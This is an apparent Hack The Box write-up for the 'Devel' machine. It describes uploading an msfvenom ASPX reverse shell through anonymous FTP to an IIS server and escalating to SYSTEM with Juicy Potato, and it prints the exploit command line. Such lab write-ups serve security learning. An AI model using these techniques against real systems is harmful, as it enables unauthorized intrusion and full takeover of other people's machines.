Devel: HTB Writeup
The first thing I did was launch a series of nmap scans against this machine.
Recon
Enumeration
In the nmap version scan above we see that port 21 and 80 are open. FTP is running on 21 and anonymous login appears to be enabled. We can also see a few files that may be in that ftp directory. Before testing anonymous logins on that service, I took a look at the web service on port 80.
The nmap version scans did show an IIS server running on port 80. This web page confirms that. I could not find anything suspicious in the source code. An interesting find is that we can browse to some of those files we saw from the nmap scan. The files we saw under that anonymous ftp directory.
Exploitation
At this point, I am hoping I can upload a shell into that ftp directory and execute it from visiting the url; which is exactly what I did. First, we create the reverse shell using msfvenom.
Then we log into the ftp server using the anonymous user account. Next put the ftp session in binary mode, upload that reverse shell (this.aspx). ASPX is a file type IIS servers can host.
After that is complete, open up a netcat listener on your listening port (mine is 1234) and then browse to the url.
Privilege Escalation
We get a shell back as a service account. If you check your permissions, you will see some special privileges enabled.
SeImpersonatePrivilege and SeCreateGlobalPrivileges gives us an opportunity to impersonate a token, hopefully the system token to create a process. There are a few tools that can do this for us. I used juicy potato which you can find here.
The exploit is pretty simple to use. First clone down the git repo. (2) Transfer a reverse shell and the rotten potato executable file to the victim box. I uploaded them using ftp. I created the reverse shell using msfvenom and stored it as an executable.
Finally, run the following command: juicy86.exe -l 443 -p shell.exe -t * -c {03ca98d6-ff5d-49b8-abc6–03dd84127020}. Do not forget to change the juicy86.exe to the name you saved the juicy potato executable as. Also, do not forget to change the shell.exe to the name of the reverse shell you created using msfvenom.
We used the bottom pane to execute the juicy potato executable. The top right windowpane shows you a shell with system level access. Last, the top left pane was used to transfer the juicy potato executable and our payload using the ftp account
Conclusion
This box was straightforward and fun. We could have kicked off some web directory scans. If we ran into a rabbit hole, I more than likely would have made gobuster my next move. I think the most difficult part would have been finding a compatible executable to run against this x86 box. I will share a video walkthrough here very soon. Thanks for reading.
